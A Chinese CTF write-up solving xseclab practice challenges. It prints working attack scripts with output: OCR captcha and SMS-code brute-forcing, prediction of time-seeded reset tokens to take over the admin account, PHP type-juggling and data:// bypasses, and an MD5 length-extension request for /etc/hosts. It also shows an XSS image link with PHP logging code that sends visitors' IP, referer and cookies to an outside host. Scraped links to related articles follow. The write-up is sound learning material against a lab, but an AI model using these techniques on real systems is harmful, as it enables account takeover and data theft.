网络安全实验室CTF练习部分题目(持续更新)

2023-11-18

1、脚本关:微笑一下,过关地址:http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php
查看源代码:

    include('flag.php'); 

    $smile = 1;  

   if (!isset ($_GET['^_^'])) $smile = 0;  
    if (preg_match ('/\./', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/%/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/[0-9]/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/http/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/https/', $_GET['^_^']) ) $smile = 0;  
    if (preg_match ('/ftp/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/telnet/', $_GET['^_^'])) $smile = 0;  
    if (preg_match ('/_/', $_SERVER['QUERY_STRING'])) $smile = 0; 
    if ($smile) { 
        if (@file_exists ($_GET['^_^'])) $smile = 0;  
    }  
    if ($smile) { 
        $smile = @file_get_contents ($_GET['^_^']);  
        if ($smile === "(●'◡'●)") die($flag);  
    } 

显然参数为^^=(●’◡’●),但QUERY_STRING过滤了‘’,且文件不能存在,但可以读取文件内容,前面又过滤了一堆http、ftp等。因PHP自动回替换.为_,使用data协议,构造参数为:?^.^=data://text/plain;charset=unicode,(●’◡’●)

2、脚本关:验证码识别并进行手机验证码爆破 http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php#

提交之前需先点一下获取验证码,查看提交后的header,取得cookie,提交的参数。
识别验证码可用tesseract,代码如下:

#!/usr/bin/python
# -*- coding: utf-8 -*-

import requests  #调用url、cookie操作 文件操作的库
import sys
import time
from pytesseract import *
from PIL import Image

def vcode(pic_url,cookies):
    "python验证码识别函数"
    r = requests.get(pic_url, cookies=cookies, timeout=10)
    with open('vcode.png', 'wb') as pic:
        pic.write(r.content)
    image=Image.open('vcode.png')
    im = image_to_string(image)
    #print im
    im = im.replace(' ', '')
    if im.isdigit() and len(im)==4:
        return im
    else:
        return vcode(pic_url,cookies)

cookies = {'saeut': '14.19.157.117.1435504248010840','PHPSESSID':'2cec394dbfba709823daea4ba71eb04a'} 
payload = {'username': '13388886666', 'mobi_code': '100','user_code':'5053','Login':'submit'}
#headers = {'user-agent': 'my-app/0.0.1'}

picurl='http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'

url="http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php"
#filename = u"D:/Users/flag.txt"

#fp = open(filename, 'a')

for i in range(100,999): 
     code1=vcode(picurl,cookies)
     #time.sleep(0.01)
     payload['user_code']=code1
     payload['mobi_code']='%d'%(i)
     wp = requests.post(url, data=payload,cookies=cookies, timeout=10)  #params=payload get,headers=headers
     #print(wp.text)
     text=wp.content
     #text=text[2:len(text)]
     #print 'length:%d'%(len(text))
     #fp.write(text.encode('utf-8'))
     responsetxt = text.encode('utf-8')
     if 'error' not in responsetxt:
           print 'The correct code is:', code1,responsetxt
           break
     else:
           print 'tring code:', i, code1,responsetxt

print("get flag success")

手机验证码从100开始尝试,取得flag后会跳出

tring code: 294 0397 user_code or mobi_code error
tring code: 295 1728 user_code or mobi_code error
The correct code is 1728 key is 133dbc85dda4aa**)
get flag success

3、解密关第1题:http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/
该题说明了可重置其他用户密码,但不可重置管理员的。
这里可使用平行权限漏洞,将其他用户改为admin,先获取cookie,sukey=md5(time()),尝试执行过程中要去点一下admin账号的重置密码,之后很快key就出来了。
代码如下:

#!/usr/bin/env python
# -*- coding: gbk -*-
import requests
import hashlib
import time
"执行前需要先点一下admin的重置密码按钮"
s = requests.Session()
header = {'Cookie': 'saeut=14.19.157.117.1435504248010840; PHPSESSID=ffb638b41b60e696a2793815bedc32fa'}
while True:
    pwd = hashlib.new('md5', str(int(time.time()))).hexdigest()
    url = 'http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?sukey=' + pwd + '&username=admin'
    r = s.get(url, headers=header)
    time.sleep(1)
    text=r.content
    responsetxt = text.encode('utf-8')
    if text != '':
        print url,r.content
        break
    else:
        print '正在破解中……', pwd

执行中去点一下admin的重置密码按钮
正在破解中…… aa4797f696c408b8cb6ec7304fc118d0
正在破解中…… 7257b11dde5b8d6135652a56c730947d
正在破解中…… 656fb3b904dfbb161ba482ce7e3496b5
正在破解中…… fd27309d902c1cc3ee209779ab5d7215
正在破解中…… b80bfe65dc163e9b7a13e0bcb6c00349
http://lab1.xseclab.com/password1_dc178aa12e73cfc184676a4100e07dac/reset.php?suk
ey=383edc5fe95d7638fae3629b29fb16f0&username=admin key is yestimeispassword

4、解密关第6题
给定的密码串,base64解码出来是乱码,显然里面某些字母应该是小写,才能保证解码出来是正确值。由于3位明文转化为4位base64值,可以通过逐位变换大小写来,以4个字符为单位观察解码后是否为可见字符。
通过递归的方式遍历,代码如下,运行结果最可能的结果是hey!IloveU!

#!/usr/bin/python
# -*- coding: utf-8 -*-

import base64
import binascii
b64str='AGV5IULSB3ZLVSE='
f=open('flag.txt','w')
def  base64code(s,d):
    global b64str
    global f
    if(d==len(b64str)):
        f.write(binascii.b2a_qp(base64.b64decode(s))+'\n')
    else:
        base64code(s+b64str[d],d+1)
        if b64str[d].isalpha():  
           base64code(s+b64str[d].lower(),d+1)



base64code('',0)

f.close()
f=open('flag.txt','r')
for l in f.readlines():
    if '=' not in l:
        print(l)

5、解密关第7题
题目地址:http://lab1.xseclab.com/pentest5_6a204bd89f3c8348afd5c77c717a097a/
题目给的代码为

<?php
$flag=FLAG;
if(isset($_POST["password"])){
    $password=$_POST['password'];
    $rootadmin="!1793422703!";
    if($password==$rootadmin){die("Please do not attack admin account!");}

    if(md5($password)==md5($rootadmin)){
        echo $flag;
    }else{
        die("Password Error!");
    }
}
?>

这题好久没做出来,突然搜索php字符串比较发现了思路。比较的是md5值,php进行字符串比较时若若双等号会转化为数字再进行比较,若用===则会根据数据类型进行比较,所以这里有漏洞。
!1793422703!的md5值为0e332932043729729062996282883873,转化为数字就是0,故只要password参数的md5值以0开头且第二位为字母即可达到目的。
http://www.219.me/posts/2884.html 这个页面有一堆,随便选一个传进去即可。
如图

6、解密关第8题
应该是硬件采集日志分析,参照http://www.waitalone.cn/security-hardware-usb.html的方法,下载逻辑分析仪软件,地址为http://downloads.saleae.com/betas/1.2.3/Logic+Setup+1.2.3.exe
看到一串值分别为iloveyouxiaoguniang!提交过去怎么都不对,搜索comma为逗号,加上逗号提交成功,key为iloveyou,xiaoguniang!
7、解密关第5题
题目地址:http://lab1.xseclab.com/password2_454a7a7cb7213e14695c022cfb04141c/index.php
这是道IC卡数据安全分析题目,比较典型,以后物联网发展也是重点。需要掌握的是金额和校验。10000为0x2710,取反为0xFFFFD8EF.
原图
若要修改余额为200元,20000为0x4e20,取反为0xFFFFB1DF,修改第6行红框数据。 第一行为uid等信息,前4位为uid,第5位为校验位,一般是CRC循环冗余校验或奇偶校验,以后再研究。将第一行或前5个字节全改为00,提交验证成功。
还可以用工具计算校验码,工具下载:http://s1.boby.im/other/XOR&KEY.exe,计算A4BA3EAA的校验码为8A,将88改为8A(其实将前4个字节求异或即得到8A)。
修改后图

8、综合关第6题
题目地址:http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/index.php
该题目是8月24日才新增的,需要更改密码,需要审计的源代码如下:

<?php 
session_start();
include '_flag.php';
date_default_timezone_set('Asia/Shanghai');
if(isset($_POST['token']) && isset($_SESSION['token']) &&!empty($_POST['token'])&&!empty($_SESSION['token'])){
    if($_POST['token']==$_SESSION['token']){
        echo "PassResetSuccess! Your Flag is:".$flag;
    }else{
        echo "Token_error!";
    }
}else{
    mt_srand(time());
    $rand= mt_rand();
    $_SESSION['token']=sha1(md5($rand));
    echo "Token Generate Ok! now send email to your EmailBox!.....";
    if(sendmymail($_SESSION['token'])){
        echo "SendOK! \r\n<br> Your password reset Token has been send to your mailbox! <br>Please Check your mail box and fill your token here to reset your password!<br>";
    };
}
echo '<form action="" method="POST">
    <input type="text" name="token">
    <input type="submit" value="submit">
</form>';
echo "<!--\r\n".file_get_contents(__FILE__);
?>

需要比较的是传入的post参数与随机生成的参数并进行hash计算后的结果比较。存在漏洞的地方是mt_srand(time()); 若 时间参数不变,mt_rand()这里生成的随机数是固定的,因此可进行爆破。
由于用的是PHP特性,使用PHP的requests模块进行(参考http://segmentfault.com/a/1190000002867007)下载后放置在一个目录,如/var/tmp/下
编写爆破代码如下:

<?php
require_once '/var/tmp/Requests/library/Requests.php';
Requests::register_autoloader();
date_default_timezone_set('Asia/Shanghai');
echo time()."start\r\n";
$data = array('token' => '0', 'submit' => 'submit');
$headers=array('Cookie' =>"your cocokie value");
$response = Requests::post('http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/resetpwd.php', $headers, $data);
$time1=time();
echo $time1."end\r\n";
echo $response->body;
//echo "time:".time()."\r\n";
//mt_srand(time());
for($i=-20;$i<20;$i++)
{
    echo $i."row:".time();
    mt_srand($time1+10+$i);
    $rand= mt_rand();
    echo $rand."\r\n";
    $token=sha1(md5($rand));
    $data = array('token' => $token, 'submit' => 'submit');
$headers=array('Cookie' =>"your cookie value");
$response = Requests::post('http://lab1.xseclab.com/pentest6_210deacdf09c9fe184d16c8f7288164f/resetpwd.php', $headers, $data);
if(strpos($response->body,"Token_error!")!=FALSE)
{
    echo $response->body;
    break;
}
}
?>

几次循环很快就可得到结果:
PassResetSuccess! Your Flag is:NotSecurityRandomNowYouKnown

9、解密关第9题:
题目地址:http://lab1.xseclab.com/decrypt1_53a52adb49c55c8daa5c8ee0ff59befe/md5_le.php
审读源代码,发现加密方式为md5( mysalt. message),且盐为6位,对路径/etc/hosts加密后得到311a96cefc6bb3fea17839489de5190b
题目有提示MD5 Length Extension Attack!
搜索MD5 Length Extension Attack找到plaidctf-2014-twenty_mtpox有道题类似。
下载工具:

git clone https://github.com/iagox86/hash_extender
cd hash_extender
make

执行:

./hash_extender -f md5 -l 6 -d '/etc/hosts' -s '311a96cefc6bb3fea17839489de5190b' -a '' --out-data-format=html
Type: md5
Secret length: 6
New signature: 08972a6d7297d58896f7f8f4c7236a95
New string: %2fetc%2fhosts%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00

注入参数

http://lab1.xseclab.com/decrypt1_53a52adb49c55c8daa5c8ee0ff59befe/md5_le.php?filepath=%2fetc%2fhosts%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%80%00%00%00%00%00%00%00&sign=08972a6d7297d58896f7f8f4c7236a95

即可得到key

Flag is: Md5LenghtExtAttackNowYouSee

10、综合关第3题
题目地址:http://lab1.xseclab.com/xss4_730ee2b59ca3b71c25efa2147498b35e/index.php
题目提示:屌丝小明进入了管理员的邮箱,获取了秘密。
还有两个提示:邮箱没有xss,管理员用的手机邮箱,通过url和sid验证。
系统有两个页面,index.php录入,post.php提交并呈现。测试发现用户名和图片说明,post页面会对自动进行html转换,而图片链接url字段未进行转换,可进行xss注射。
根据题目说明,发送的图片会到管理员邮箱进行审核,由于速度很快,邮箱应该是自动审核。这里只要抓取到管理员访问该图片的referer即可。尝试xss获取referer,未成功。
浪费了不少时间,想放弃了,但因只剩一题未解了,多有遗憾。再给管理员发信,得知思路基本那样,构造一个图片url,可以获取对方IP和访问的邮箱地址。再后来管理员提示了一个系统:
http://t.cn/RyPhtE2. 可自动生成一个图片,可获取url和地址,系统就是他们自己做的,系统并未公开,说明如下:

该平台可帮助您查看对方的ip地址和操作系统等有关信息。
            本系统不是XSS平台,但拥有比XSS平台更为特殊的功能!

使用方法:
1.将本平台生成的图片标签嵌入到要探测的网页或邮件正文中
2.访客访问该图片或者图片在页面中被自动加载均可刺探到访客信息
3.到本平台查看获取到的信息即可

登录该系统,生成一个图片,将图片的url放到题目index.php中图片链接url处,提交后该系统会自动记录访问情况,发现一条记录:
访问浏览器为

SAE/fetchurl-x2wowz30k1 Mozilla/6.0 (Macintosh; Intel Mac OS X 10_10_9) AppleWebKit/538.38 (KHTML, like Gecko) Chrome Safari

地址为220.181.136.229,页面地址为:http://lab1.xseclab.com/xss4_730ee2b59ca3b71c25efa2147498b35e/mymailbox_25777445a35a9588.php?sid=94b66e964217ccea672525a3a3125124
访问该页面即可获得key。
后来在新浪云平台(sinaapp)建立了个站点进行测试确实如此,只要获取referer即可。
在新浪云平台建立个页面,获取ip、referer等存入数据库,代码如下:

<?php
$mysql = new SaeMysql();
$cookie = $_GET['c'];
$ip = getenv ('REMOTE_ADDR');
$time=date("j F, Y, g:i a");
$referer=getenv ('HTTP_REFERER');

$sql="insert into xsstest values (1,'".$ip."','".$time."','".$referer."','".$cookie."')";

echo $sql."<br>";
$mysql->runSql($sql);

if ($mysql->errno() != 0)
{
    die("Error:" . $mysql->errmsg());
}

$mysql->closeDb();

?> 

在图片链接中输入该页面访问地址,提交后数据库多了两条记录,一条是题目平台访问,一条是客户端post.php页面呈现时访问记录。题目平台访问的referer即为邮箱地址,访问该地址获得可以。
题目其实不复杂,只要xss获得referer地址即可,比较简单的xss注入。但提示模糊,线索不清楚,题目不算太好,不过也算开拓了下思路。

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

网络安全实验室CTF练习部分题目(持续更新) 的相关文章

  • 虚拟机内搭建CTFd平台搭建及CTF题库部署,局域网内机器可以访问

    一 虚拟机环境搭建 1 安装docker git docker compose ubuntu sudo apt get update 更新系统 sudo apt get y install docker io 安装docker sudo a
  • buuCTF [ISITDTU 2019]EasyPHP 1

    buuCTF ISITDTU 2019 EasyPHP 1 直接代码审计 第一个if 过preg match 一般有三种方法 取反绕过 异或绕过 转义绕过 这里用取反绕过 第二个if的意思是输入的字符串不重复的字符长度不超过0xd即13 如
  • fileclude(文件包含漏洞及php://input、php://filter的使用)

    先介绍一些知识 1 文件包含漏洞 和SQL注入等攻击方式一样 文件包含漏洞也是一种注入型漏洞 其本质就是输入一段用户能够控制的脚本或者代码 并让服务端执行 什么叫包含呢 以PHP为例 我们常常把可重复使用的函数写入到单个文件中 在使用该函数
  • 第十五届全国大学生信息安全竞赛(ciscn初赛) 部分writeup

    杂项的附件地址 https share weiyun com BZyngGSZ CISCN web Ezpop misc everlasting night ez usb 问卷调查 pwn login nomal crypto 签到电台 基
  • buuctf [强网杯 2019]随便注 1

    buuctf web 强网杯 2019 随便注 1 刷题个人日记 小白一个 写给自己看 打开后是这样 从题目和内容来看就是一道sql注入题 输入 1 or 1 1 这个 用来注释掉后面的sql语句 显示所有数据 这个数据有什么用我也不知道
  • upload-labs:pass-10

    is upload false msg null if isset POST submit if file exists UPLOAD PATH deny ext array php php5 php4 php3 php2 html htm
  • volatility内存取证分析与讲解(持续更新)

    volatility内存取证分析与讲解 0x01 volatility的安装 0x02 基本使用 0x03 取证实战 持续更新 0x04 总结 0x01 volatility的安装 本人暂时只使用windows下的volatility进行取
  • ctfshow-web3

    0x00 前言 CTF 加解密合集 CTF Web合集 0x01 题目 0x02 Write Up 这个题目一看就知道是一个文件包含漏洞 php input可以访问请求的原始数据的只读流 将post请求的数据当作php代码执行 GET ht
  • 懂的都懂,那些好用的“WEB安全”网站

    加密解密 解码编码 MD5 https www cmd5 com 凯撒 https www qqxiuzi cn bianma kaisamima php 摩斯密码 https www jb51 net tools morse htm ht
  • ctfshow-web4

    0x00 前言 CTF 加解密合集 CTF Web合集 0x01 题目 0x02 Write Up 和web3是相同的内容 这里可以通过任意文件读取的方式来进行利用 这里根据返回包知道是nginx 默认nginx日志是 var log ng
  • CTF_ctfshow_web9_sql注入

    打开靶机 手工注了一下 发现没有注入点 然后查看了一下robots txt协议 提示了index phps 访问一下 下载下来了源码
  • BUUCTF:[GXYCTF2019]BabyUpload1

    文件上传漏洞 不过这里我要吐槽一下 这个题首先他不允许传 png文件 再者 jpg文件不能大 打了也报错 传不上去 可想而知 我当时在做这个题的时候跟见了鬼一样难受 什么文件都传不了 接着做题吧 试着传一个PHP文件 告诉我不能传ph开头的
  • Burp Suit+Phpstudy+Pikachu搭建Web安全练习环境

    1 软件安全测试工具Burp Suit安装 1 1 社区版 进入官网 Download Burp Suite Community Edition PortSwigger 进行下载安装即可 1 2 专业版 搜索Burp Suit2 0 11从
  • ctfshow---sql注入(214-253)

    目录 web214 web215 web216 web217 web218 web219 web220 web221 web222 web223 web224 web225 web226 web227 web228 229 230 web2
  • [NCTF2019]Fake XML cookbook

    NCTF2019 Fake XML cookbook 日常刷题 打开题目嗯 一开始我的脑子里想到的是禁止自娱自乐 狗头 哈哈 第一想法就是试一下admin 别问为什么 web狗的自觉 果然没这么容易 抓包 将提交的数据放到了doLogin
  • 攻防世界adworld-hit-the-core

    hit the core 题目来源 CTF 题目描述 暂无 题目附件 下载附件 kwkl kwkl strings home kwkl 桌面 8deb5f0c2cd84143807b6175f58d6f3f core CORE code c
  • [SHCTF 2023]——week1-week3 Web方向详细Writeup

    Week1 babyRCE 源码如下
  • pwn入门:基本栈溢出之ret2libc详解(以32位+64位程序为例)

    目录 写在开头 题目简介 解题思路 前置知识 简要了解 plt表和got表 延迟绑定 例题详解 32位 64位 总结与思考 写在开头 这篇博客早就想写了 但由于近期事情较多 一直懒得动笔 近期被领导派去临时给合作单位当讲师 要给零基础的学员
  • BugKu-Web-滑稽

    题目环境 持续的动态图片 F12审查元素 拿下flag flag 595d994a34342417bfc3a3c3a23e0a48
  • 【CTF必看】从零开始的CTF学习路线(超详细),让你从小白进阶成大神!

    最近很多朋友在后台私信我 问应该怎么入门CTF 个人认为入门CTF之前大家应该先了解到底 什么是CTF 而你 学CTF的目的又到底是什么 其次便是最好具备相应的编程能力 若是完全不具备这些能力极有可能直接被劝退 毕竟比赛的时候动不动写个脚本

随机推荐

  • python基础十:模块

    1 模块简介 模块化指将一个完整的程序分解成一个个的小模块 通过将模块组合 来搭建出一个完整的程序 模块化的优点 方便开发 方便维护 模块可以复用 2 模块的创建 在Python当中一个py文件就是一个模块 在一个模块中引入外部模块 imp
  • HpSocket源码使用

    说明 去除了不必要的文件 已建好tcpserver tcpclient 无连接的udpServer和udpclient类 可直接复制到项目中 然后在回调函数里面添加自己的处理函数即可 方便开发 详细使用说明见压缩包里的说明 https do
  • eclipse 启动web项目提示:Server Tomcat v7.0 Server at localhost was unable to start within 101 seconds。

    今天通过eclipse 启动web 项目提示如下错误信息 Server Tomcat v7 0 Server at localhost was unable to start within 101 seconds If the server
  • 骑缝章的正确盖法(详细图文教程)

    一般商务场景都需要盖骑缝章 合同 标书等尤其需要 因为加盖了骑缝章 合同展开后可以将骑缝章还原成原章 因此可以防止对方更换合同内页 防止对方否认合同内容 并避免因更换合同内容或否认合同内容而造成的不必要的麻烦 骑缝章有2个原则 1 印章要覆
  • 使用R语言的names函数为DataFrame数据中的所有列进行重命名

    使用R语言的names函数为DataFrame数据中的所有列进行重命名 在R语言中 DataFrame是一种常用的数据结构 用于存储和处理表格型数据 有时候 我们需要为DataFrame中的列重新命名 以便更好地理解和处理数据 这时可以使用
  • 【华为OD统一考试B卷

    在线OJ 已购买本专栏用户 请私信博主开通账号 在线刷题 运行出现 Runtime Error 0Aborted 请忽略 华为OD统一考试A卷 B卷 新题库说明 2023年5月份 华为官方已经将的 2022 0223Q 1 2 3 4 统一
  • JavaSE进阶(一)—— 面向对象进阶(static、单例、代码块、继承)

    目录 一 static静态关键字 1 static是什么 static修饰成员变量的用法 2 成员方法的分类 2 1 使用场景 3 static修饰成员方法的内存原理 4 static的注意事项 拓展 二 static应用知识 工具类 1
  • Python实现一个简单的HTTP服务器(GET/POST)

    目录 一 HTTP协议的工作原理概览 二 Request Message 三 Response Message 四 实现步骤 五 代码 六 测试 一 HTTP协议的工作原理概览 首先需要了解HTTP协议是怎么工作的 首先用户在browser
  • Gperf的安装使用

    在工程文件夹下 make cmd lookup c时报错 似乎是找不到gperf的命令 检查一下原来是没有安装gperf 于是从SOURCEFORGE上搜索Gperf 找不到 后来索性找了一个 添加链接描述 http savannah gn
  • 关于MySQL的学习笔记(超详细超完整)

    SQL 1 什么是数据库 1 全称 DataBase 简称 DB 2 数据库其实就是按照一定的格式进行存储数据的一些文件或者文件集合 理解 存储数据的仓库 而这些数据在实时存储的过程中是有特定格式的 2 什么是数据库管理系统 1 全称 Da
  • 微服务项目【分布式锁】

    创建Redisson模块 第1步 基于Spring Initialzr方式创建zmall redisson模块 第2步 在zmall redisson模块中添加相关依赖
  • 新概念英语第二册

    http www 24en com brand concept xgn2
  • 05-Flask-Flask查询路由方式

    Flask查询路由方式 前言 命令行方式 代码实现返回所有路由 前言 本篇来学习下Flask中查询路由的方式 命令行方式 window 用set linux 用 export set FLASK APP test 6 flask运行发方式
  • QT开发之对话框相关

    1 回车键和ESC按键会关闭对话框的问题 头文件 include
  • DataFrame的索引(一)

    1 选择列 import pandas as pd import numpy as np from pandas import Series DataFrame df DataFrame np random rand 12 reshape
  • 简历中尽量不要出现精通_“熟练”“精通”,这些词在简历中要慎用

    很多求职者在描述自己的技能特长的时候 简历中都会出现这样的描述 熟练操作XX软件 或者 掌握Word Excel PPT等运用 更有的人会用 精通 这样的词 但这样的描述在HR看来 就属于夸大其词 弄虚作假了 熟练操作 等于你不仅仅能够自由
  • html的textarea标签的文本显示,文本框样式简单设置

    html的textarea标签的文本显示 文本框样式简单设置 后端传递数据如何在textarea标签的文本框内显示 如下
  • 法律信息爬虫:Python爬虫获取法律文件和法规信息

    目录 第一部分 选择目标网站 第二部分 分析网站结构和查询方式
  • 静态分析分析

    软件静态分析概念 静态分析通常是指不执行程序代码而寻找代码中可能存在的错误或评估程序代码的过程 被测对象是各种不软件相关的有必要测试的产物 如文档 源代码等 通过扫描程序正文对程序的数据流和控制流等进行分析 找出系统的缺陷 得出测试报告 不
  • 网络安全实验室CTF练习部分题目(持续更新)

    1 脚本关 微笑一下 过关地址 http lab1 xseclab com base13 ead1b12e47ec7cc5390303831b779d47 index php 查看源代码 include flag php smile 1 i